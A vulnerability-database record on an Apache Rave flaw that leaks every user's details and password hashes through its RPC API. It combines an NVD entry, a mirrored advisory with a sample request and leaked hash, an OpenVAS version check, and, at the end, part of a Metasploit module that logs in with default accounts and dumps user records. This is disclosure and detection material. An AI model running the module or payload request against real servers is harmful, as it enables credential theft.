{"bulletinFamily": "exploit", "id": "D2SEC_APACHE_RAVE", "lastseen": "2019-05-29T19:19:06", "description": "**Name**| d2sec_apache_rave \n---|--- \n**CVE**| CVE-2013-1814 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_apache_rave.py \n**Notes**| \n", "cvelist": ["CVE-2013-1814"], "viewCount": 520, "published": "2013-03-14T00:55:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_apache_rave", "references": [], "reporter": "DSquare", "edition": 2, "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "title": "DSquare Exploit Pack: D2SEC_APACHE_RAVE", "modified": "2013-03-14T00:55:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1814"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13053", "SECURITYVULNS:DOC:29371"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120769"]}, {"type": "exploitdb", "idList": ["EDB-ID:24744"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/APACHE_RAVE_CREDS"]}, {"type": "seebug", "idList": ["SSV:78436"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2CE46B2666F25C13ECFE3632FA162641"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803180"]}], "modified": "2019-05-29T19:19:06", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2019-05-29T19:19:06", "rev": 2}, "vulnersScore": 5.8}, "type": "d2", "scheme": null, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:06:50", "description": "The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.", "edition": 4, "cvss3": {}, "published": "2013-03-14T00:55:00", "title": "CVE-2013-1814", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1814"], "modified": "2013-07-03T17:03:00", "cpe": ["cpe:/a:apache:rave:0.16", "cpe:/a:apache:rave:0.15", "cpe:/a:apache:rave:0.14", "cpe:/a:apache:rave:0.11", "cpe:/a:apache:rave:0.12", "cpe:/a:apache:rave:0.18", "cpe:/a:apache:rave:0.20", "cpe:/a:apache:rave:0.17", "cpe:/a:apache:rave:0.19", "cpe:/a:apache:rave:0.13"], "id": "CVE-2013-1814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1814", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apache:rave:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:rave:0.12:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1814"], "description": "\r\n\r\nCVE-2013-1814: Apache Rave exposes User over API\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRave 0.11 to 0.20\r\n\r\nDescription:\r\nRave returns the full user object, including the salted and hashed\r\npassword, via the User RPC API. This endpoint is only available to\r\nauthenticated users, but will return all User objects in the database\r\ngiven the correct query.\r\n\r\nMitigation:\r\nAll users who rely on Rave&#39;s user management capabilities should\r\nupgrade to 0.20.1 or later.\r\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\r\npaths via Spring Security configuration or other means.\r\n\r\nExample:\r\nA request to:\r\n\r\n/app/api/rpc/users/get?offset=3DOFFSET\r\n\r\nwill return the following:\r\n\r\n{&quot;error&quot;:false,&quot;errorMessage&quot;:null,&quot;errorCode&quot;:&quot;NO_ERROR&quot;,&quot;result&quot;:{&quot;result=\r\nSet&quot;:[{&quot;entityId&quot;:1,&quot;username&quot;:&quot;canonical&quot;,&quot;email&quot;:&quot;canonical@example.com&quot;,=\r\n&quot;displayName&quot;:&quot;Canonical\r\nUser&quot;,&quot;additionalName&quot;:&quot;canonical&quot;,&quot;familyName&quot;:&quot;User&quot;,&quot;givenName&quot;:&quot;Canonic=\r\nal&quot;,&quot;honorificPrefix&quot;:null,&quot;honorificSuffix&quot;:null,&quot;preferredName&quot;:null,&quot;abo=\r\nutMe&quot;:null,&quot;status&quot;:&quot;Single&quot;,&quot;addresses&quot;:[],&quot;organizations&quot;:[],&quot;properties&quot;=\r\n:[{&quot;entityId&quot;:1,&quot;type&quot;:&quot;thumbnailUrl&quot;,&quot;value&quot;:&quot;http://opensocial2.org:8080/=\r\ncollabapp/images/avatars/BillRanney.jpg&quot;,&quot;qualifier&quot;:null,&quot;extendedValue&quot;:n=\r\null,&quot;primary&quot;:null,&quot;id&quot;:&quot;1&quot;}],&quot;password&quot;:&quot;$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\r\n1ND8WPjLojFjAMNgZMu1D9D1n4.&quot;,&quot;expired&quot;:false,&quot;locked&quot;:false,&quot;enabled&quot;:true,=\r\n&quot;openId&quot;:null,&quot;forgotPasswordHash&quot;:null,&quot;forgotPasswordTime&quot;:null,&quot;defaultP=\r\nageLayout&quot;:{&quot;entityId&quot;:4,&quot;code&quot;:&quot;columns_3&quot;,&quot;numberOfRegions&quot;:3,&quot;renderSequ=\r\nence&quot;:3,&quot;userSelectable&quot;:true},&quot;confirmPassword&quot;:null,&quot;defaultPageLayoutCod=\r\ne&quot;:null,&quot;authorities&quot;:[{&quot;entityId&quot;:2,&quot;authority&quot;:&quot;ROLE_ADMIN&quot;,&quot;users&quot;:[],&quot;d=\r\nefaultForNewUser&quot;:false}],&quot;id&quot;:&quot;1&quot;,&quot;accountNonLocked&quot;:true,&quot;credentialsNonE=\r\nxpired&quot;:true,&quot;accountNonExpired&quot;:true},\r\n........ ],&quot;pageSize&quot;:10,&quot;offset&quot;:0,&quot;totalResults&quot;:14,&quot;numberOfPages&quot;:2,&quot;cu=\r\nrrentPage&quot;:1}}\r\n\r\nCredit:\r\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html\r\n", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:DOC:29371", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29371", "title": "[CVE-2013-1814] Apache Rave exposes User over API", "type": "securityvulns", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-3242", "CVE-2013-2631", "CVE-2013-2267", "CVE-2013-2504", "CVE-2012-0790", "CVE-2013-0232", "CVE-2013-3239", "CVE-2013-0332", "CVE-2013-2594", "CVE-2013-1420", "CVE-2013-2945", "CVE-2013-2712", "CVE-2013-2750", "CVE-2013-1842", "CVE-2013-2714", "CVE-2013-3238", "CVE-2013-1904", "CVE-2013-2559", "CVE-2013-2582", "CVE-2013-1843", "CVE-2013-2713", "CVE-2013-2474", "CVE-2012-6096", "CVE-2013-1814"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-05-06T00:00:00", "published": "2013-05-06T00:00:00", "id": "SECURITYVULNS:VULN:13053", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13053", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-04-23T19:05:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1814"], "description": "The host is running Apache Rave and is prone to information\n disclosure vulnerability.", "modified": "2020-04-21T00:00:00", "published": "2013-03-14T00:00:00", "id": "OPENVAS:1361412562310803180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803180", "type": "openvas", "title": "Apache Rave User Information Disclosure Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Rave User Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:rave\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803180\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2013-1814\");\n script_bugtraq_id(58455);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-14 16:32:56 +0530 (Thu, 14 Mar 2013)\");\n script_name(\"Apache Rave User Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/82758\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/24744/\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/120769/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/Mar/127\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/525982/30/0/threaded\");\n\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_rave_detect.nasl\");\n script_mandatory_keys(\"ApacheRave/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to obtain sensitive\n information about all user accounts via the offset parameter.\");\n script_tag(name:\"affected\", value:\"Apache Rave versions 0.11 to 0.20\");\n script_tag(name:\"insight\", value:\"The flaw is due to error in handling of User RPC API, returns the full user\n object, including the salted and hashed password.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Rave 0.20.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is running Apache Rave and is prone to information\n disclosure vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://rave.apache.org/downloads.html\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!vers = get_app_version(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(vers =~ \"^0\\.\")\n{\n if(version_in_range(version:vers, test_version:\"0.11\", test_version2:\"0.20\")){\n report = report_fixed_ver(installed_version:vers, vulnerable_range:\"0.11 - 0.20\");\n security_message(port:port, data:report);\n }\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:08", "description": "", "published": "2013-03-12T00:00:00", "type": "packetstorm", "title": "Apache Rave User Exposure", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2013-03-12T00:00:00", "id": "PACKETSTORM:120769", "href": "https://packetstormsecurity.com/files/120769/Apache-Rave-User-Exposure.html", "sourceData": "`CVE-2013-1814: Apache Rave exposes User over API \n \nSeverity: Important \n \nVendor: The Apache Software Foundation \n \nVersions Affected: \nRave 0.11 to 0.20 \n \nDescription: \nRave returns the full user object, including the salted and hashed \npassword, via the User RPC API. This endpoint is only available to \nauthenticated users, but will return all User objects in the database \ngiven the correct query. \n \nMitigation: \nAll users who rely on Rave's user management capabilities should \nupgrade to 0.20.1 or later. \nIf an upgrade is infeasible, restrict access to the /app/api/user URL \npaths via Spring Security configuration or other means. \n \nExample: \nA request to: \n \n/app/api/rpc/users/get?offset=3DOFFSET \n \nwill return the following: \n \n{\"error\":false,\"errorMessage\":null,\"errorCode\":\"NO_ERROR\",\"result\":{\"result= \nSet\":[{\"entityId\":1,\"username\":\"canonical\",\"email\":\"canonical@example.com\",= \n\"displayName\":\"Canonical \nUser\",\"additionalName\":\"canonical\",\"familyName\":\"User\",\"givenName\":\"Canonic= \nal\",\"honorificPrefix\":null,\"honorificSuffix\":null,\"preferredName\":null,\"abo= \nutMe\":null,\"status\":\"Single\",\"addresses\":[],\"organizations\":[],\"properties\"= \n:[{\"entityId\":1,\"type\":\"thumbnailUrl\",\"value\":\"http://opensocial2.org:8080/= \ncollabapp/images/avatars/BillRanney.jpg\",\"qualifier\":null,\"extendedValue\":n= \null,\"primary\":null,\"id\":\"1\"}],\"password\":\"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P= \n1ND8WPjLojFjAMNgZMu1D9D1n4.\",\"expired\":false,\"locked\":false,\"enabled\":true,= \n\"openId\":null,\"forgotPasswordHash\":null,\"forgotPasswordTime\":null,\"defaultP= \nageLayout\":{\"entityId\":4,\"code\":\"columns_3\",\"numberOfRegions\":3,\"renderSequ= \nence\":3,\"userSelectable\":true},\"confirmPassword\":null,\"defaultPageLayoutCod= \ne\":null,\"authorities\":[{\"entityId\":2,\"authority\":\"ROLE_ADMIN\",\"users\":[],\"d= \nefaultForNewUser\":false}],\"id\":\"1\",\"accountNonLocked\":true,\"credentialsNonE= \nxpired\":true,\"accountNonExpired\":true}, \n........ ],\"pageSize\":10,\"offset\":0,\"totalResults\":14,\"numberOfPages\":2,\"cu= \nrrentPage\":1}} \n \nCredit: \nThis issue was discovered by Andreas Guth of RWTH Aachen University. \n \nReferences: \nhttp://tomcat.apache.org/security.html \n \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120769/CVE-2013-1814.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Rave 0.11 0.20 - User Information Disclosure", "edition": 1, "published": "2013-03-13T00:00:00", "title": "Apache Rave 0.11 0.20 - User Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2013-03-13T00:00:00", "id": "EXPLOITPACK:2CE46B2666F25C13ECFE3632FA162641", "href": "", "sourceData": "CVE-2013-1814: Apache Rave exposes User over API\n\nSeverity: Important\n\nVendor: The Apache Software Foundation\n\nVersions Affected:\nRave 0.11 to 0.20\n\nDescription:\nRave returns the full user object, including the salted and hashed\npassword, via the User RPC API. This endpoint is only available to\nauthenticated users, but will return all User objects in the database\ngiven the correct query.\n\nMitigation:\nAll users who rely on Rave's user management capabilities should\nupgrade to 0.20.1 or later.\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\npaths via Spring Security configuration or other means.\n\nExample:\nA request to:\n\n/app/api/rpc/users/get?offset=OFFSET\n\nwill return the following:\n\n{\"error\":false,\"errorMessage\":null,\"errorCode\":\"NO_ERROR\",\"result\":{\"result=\nSet\":[{\"entityId\":1,\"username\":\"canonical\",\"email\":\"canonical@example.com\",=\n\"displayName\":\"Canonical\nUser\",\"additionalName\":\"canonical\",\"familyName\":\"User\",\"givenName\":\"Canonic=\nal\",\"honorificPrefix\":null,\"honorificSuffix\":null,\"preferredName\":null,\"abo=\nutMe\":null,\"status\":\"Single\",\"addresses\":[],\"organizations\":[],\"properties\"=\n:[{\"entityId\":1,\"type\":\"thumbnailUrl\",\"value\":\"http://opensocial2.org:8080/=\ncollabapp/images/avatars/BillRanney.jpg\",\"qualifier\":null,\"extendedValue\":n=\null,\"primary\":null,\"id\":\"1\"}],\"password\":\"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\n1ND8WPjLojFjAMNgZMu1D9D1n4.\",\"expired\":false,\"locked\":false,\"enabled\":true,=\n\"openId\":null,\"forgotPasswordHash\":null,\"forgotPasswordTime\":null,\"defaultP=\nageLayout\":{\"entityId\":4,\"code\":\"columns_3\",\"numberOfRegions\":3,\"renderSequ=\nence\":3,\"userSelectable\":true},\"confirmPassword\":null,\"defaultPageLayoutCod=\ne\":null,\"authorities\":[{\"entityId\":2,\"authority\":\"ROLE_ADMIN\",\"users\":[],\"d=\nefaultForNewUser\":false}],\"id\":\"1\",\"accountNonLocked\":true,\"credentialsNonE=\nxpired\":true,\"accountNonExpired\":true},\n........ ],\"pageSize\":10,\"offset\":0,\"totalResults\":14,\"numberOfPages\":2,\"cu=\nrrentPage\":1}}\n\nCredit:\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\n\nReferences:\nhttp://tomcat.apache.org/security.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T14:57:06", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Rave 0.11 - 0.20 - User Information Disclosure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78436", "id": "SSV:78436", "sourceData": "\n CVE-2013-1814: Apache Rave exposes User over API\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRave 0.11 to 0.20\r\n\r\nDescription:\r\nRave returns the full user object, including the salted and hashed\r\npassword, via the User RPC API. This endpoint is only available to\r\nauthenticated users, but will return all User objects in the database\r\ngiven the correct query.\r\n\r\nMitigation:\r\nAll users who rely on Rave&#39;s user management capabilities should\r\nupgrade to 0.20.1 or later.\r\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\r\npaths via Spring Security configuration or other means.\r\n\r\nExample:\r\nA request to:\r\n\r\n/app/api/rpc/users/get?offset=3DOFFSET\r\n\r\nwill return the following:\r\n\r\n{&#34;error&#34;:false,&#34;errorMessage&#34;:null,&#34;errorCode&#34;:&#34;NO_ERROR&#34;,&#34;result&#34;:{&#34;result=\r\nSet&#34;:[{&#34;entityId&#34;:1,&#34;username&#34;:&#34;canonical&#34;,&#34;email&#34;:&#34;canonical@example.com&#34;,=\r\n&#34;displayName&#34;:&#34;Canonical\r\nUser&#34;,&#34;additionalName&#34;:&#34;canonical&#34;,&#34;familyName&#34;:&#34;User&#34;,&#34;givenName&#34;:&#34;Canonic=\r\nal&#34;,&#34;honorificPrefix&#34;:null,&#34;honorificSuffix&#34;:null,&#34;preferredName&#34;:null,&#34;abo=\r\nutMe&#34;:null,&#34;status&#34;:&#34;Single&#34;,&#34;addresses&#34;:[],&#34;organizations&#34;:[],&#34;properties&#34;=\r\n:[{&#34;entityId&#34;:1,&#34;type&#34;:&#34;thumbnailUrl&#34;,&#34;value&#34;:&#34;http://opensocial2.org:8080/=\r\ncollabapp/images/avatars/BillRanney.jpg&#34;,&#34;qualifier&#34;:null,&#34;extendedValue&#34;:n=\r\null,&#34;primary&#34;:null,&#34;id&#34;:&#34;1&#34;}],&#34;password&#34;:&#34;$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\r\n1ND8WPjLojFjAMNgZMu1D9D1n4.&#34;,&#34;expired&#34;:false,&#34;locked&#34;:false,&#34;enabled&#34;:true,=\r\n&#34;openId&#34;:null,&#34;forgotPasswordHash&#34;:null,&#34;forgotPasswordTime&#34;:null,&#34;defaultP=\r\nageLayout&#34;:{&#34;entityId&#34;:4,&#34;code&#34;:&#34;columns_3&#34;,&#34;numberOfRegions&#34;:3,&#34;renderSequ=\r\nence&#34;:3,&#34;userSelectable&#34;:true},&#34;confirmPassword&#34;:null,&#34;defaultPageLayoutCod=\r\ne&#34;:null,&#34;authorities&#34;:[{&#34;entityId&#34;:2,&#34;authority&#34;:&#34;ROLE_ADMIN&#34;,&#34;users&#34;:[],&#34;d=\r\nefaultForNewUser&#34;:false}],&#34;id&#34;:&#34;1&#34;,&#34;accountNonLocked&#34;:true,&#34;credentialsNonE=\r\nxpired&#34;:true,&#34;accountNonExpired&#34;:true},\r\n........ ],&#34;pageSize&#34;:10,&#34;offset&#34;:0,&#34;totalResults&#34;:14,&#34;numberOfPages&#34;:2,&#34;cu=\r\nrrentPage&#34;:1}}\r\n\r\nCredit:\r\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html\n ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78436"}], "exploitdb": [{"lastseen": "2016-02-02T23:55:56", "description": "Apache Rave 0.11 - 0.20 - User Information Disclosure. CVE-2013-1814. Webapps exploits for multiple platform", "published": "2013-03-13T00:00:00", "type": "exploitdb", "title": "Apache Rave 0.11 - 0.20 - User Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2013-03-13T00:00:00", "id": "EDB-ID:24744", "href": "https://www.exploit-db.com/exploits/24744/", "sourceData": "CVE-2013-1814: Apache Rave exposes User over API\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\nRave 0.11 to 0.20\r\n\r\nDescription:\r\nRave returns the full user object, including the salted and hashed\r\npassword, via the User RPC API. This endpoint is only available to\r\nauthenticated users, but will return all User objects in the database\r\ngiven the correct query.\r\n\r\nMitigation:\r\nAll users who rely on Rave's user management capabilities should\r\nupgrade to 0.20.1 or later.\r\nIf an upgrade is infeasible, restrict access to the /app/api/user URL\r\npaths via Spring Security configuration or other means.\r\n\r\nExample:\r\nA request to:\r\n\r\n/app/api/rpc/users/get?offset=3DOFFSET\r\n\r\nwill return the following:\r\n\r\n{\"error\":false,\"errorMessage\":null,\"errorCode\":\"NO_ERROR\",\"result\":{\"result=\r\nSet\":[{\"entityId\":1,\"username\":\"canonical\",\"email\":\"canonical@example.com\",=\r\n\"displayName\":\"Canonical\r\nUser\",\"additionalName\":\"canonical\",\"familyName\":\"User\",\"givenName\":\"Canonic=\r\nal\",\"honorificPrefix\":null,\"honorificSuffix\":null,\"preferredName\":null,\"abo=\r\nutMe\":null,\"status\":\"Single\",\"addresses\":[],\"organizations\":[],\"properties\"=\r\n:[{\"entityId\":1,\"type\":\"thumbnailUrl\",\"value\":\"http://opensocial2.org:8080/=\r\ncollabapp/images/avatars/BillRanney.jpg\",\"qualifier\":null,\"extendedValue\":n=\r\null,\"primary\":null,\"id\":\"1\"}],\"password\":\"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P=\r\n1ND8WPjLojFjAMNgZMu1D9D1n4.\",\"expired\":false,\"locked\":false,\"enabled\":true,=\r\n\"openId\":null,\"forgotPasswordHash\":null,\"forgotPasswordTime\":null,\"defaultP=\r\nageLayout\":{\"entityId\":4,\"code\":\"columns_3\",\"numberOfRegions\":3,\"renderSequ=\r\nence\":3,\"userSelectable\":true},\"confirmPassword\":null,\"defaultPageLayoutCod=\r\ne\":null,\"authorities\":[{\"entityId\":2,\"authority\":\"ROLE_ADMIN\",\"users\":[],\"d=\r\nefaultForNewUser\":false}],\"id\":\"1\",\"accountNonLocked\":true,\"credentialsNonE=\r\nxpired\":true,\"accountNonExpired\":true},\r\n........ ],\"pageSize\":10,\"offset\":0,\"totalResults\":14,\"numberOfPages\":2,\"cu=\r\nrrentPage\":1}}\r\n\r\nCredit:\r\nThis issue was discovered by Andreas Guth of RWTH Aachen University.\r\n\r\nReferences:\r\nhttp://tomcat.apache.org/security.html", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/24744/"}], "metasploit": [{"lastseen": "2019-12-09T15:11:32", "description": "This module exploits an information disclosure in Apache Rave 0.20 and prior. The vulnerability exists in the RPC API, which allows any authenticated user to disclose information about all the users, including their password hashes. In order to authenticate, the user can provide his own credentials. Also the default users installed with Apache Rave 0.20 will be tried automatically. This module has been successfully tested on Apache Rave 0.20.\n", "published": "2013-07-09T19:03:35", "type": "metasploit", "title": "Apache Rave User Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1814"], "modified": "2018-08-21T13:50:26", "id": "MSF:AUXILIARY/GATHER/APACHE_RAVE_CREDS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Rave User Information Disclosure',\n 'Description' => %q{\n This module exploits an information disclosure in Apache Rave 0.20 and prior. The\n vulnerability exists in the RPC API, which allows any authenticated user to\n disclose information about all the users, including their password hashes. In order\n to authenticate, the user can provide his own credentials. Also the default users\n installed with Apache Rave 0.20 will be tried automatically. This module has been\n successfully tested on Apache Rave 0.20.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Andreas Guth', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1814' ],\n [ 'OSVDB', '91235' ],\n [ 'BID', '58455' ],\n [ 'EDB', '24744']\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),\n OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),\n OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def login(username, password)\n uri = normalize_uri(target_uri.to_s, \"j_spring_security_check\")\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'POST',\n 'vars_post' => {\n 'j_password' => username,\n 'j_username' => password\n }\n })\n\n if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.get_cookies =~ /JSESSIONID=(.*);/\n return $1\n else\n return nil\n end\n end\n\n def disclose(cookie, offset)\n uri = normalize_uri(target_uri.to_s, \"app\", \"api\", \"rpc\", \"users\", \"get\")\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n 'vars_get' => {\n 'offset' => \"#{offset}\"\n },\n 'cookie' => \"JSESSIONID=#{cookie}\"\n })\n\n if res and res.code == 200 and res.headers['Content-Type'] =~ /application\\/json/ and res.body =~ /resultSet/\n return res.body\n else\n return nil\n end\n\n end\n\n def setup\n # Default accounts installed and enabled on Apache Rave 0.20\n @default_accounts = {\n \"canonical\" => \"canonical\",\n \"john.doe\" => \"john.doe\",\n \"jane.doe\" => \"jane.doe\",\n \"johnldap\" => \"johnldap\",\n \"four.col\" => \"four.col\",\n \"fourwn.col\" => \"fourwn.col\",\n \"george.doe\" => \"george.doe\",\n \"maija.m\" => \"maija.m\",\n \"mario.rossi\" => \"mario.rossi\",\n \"one.col\" => \"one.col\",\n \"three.col\" => \"three.col\",\n \"threewn.col\" => \"threewn.col\",\n \"twown.col\" => \"twown.col\"\n }\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n def run\n\n print_status(\"#{rhost}:#{rport} - Fingerprinting...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.to_s, \"login\"),\n 'method' => 'GET',\n })\n\n if not res\n print_error(\"#{rhost}:#{rport} - No response, aborting...\")\n return\n elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\\.]*)<\\/span>/\n version =$1\n if version <= \"0.20\"\n print_good(\"#{rhost}:#{rport} - Apache Rave #{version} found. 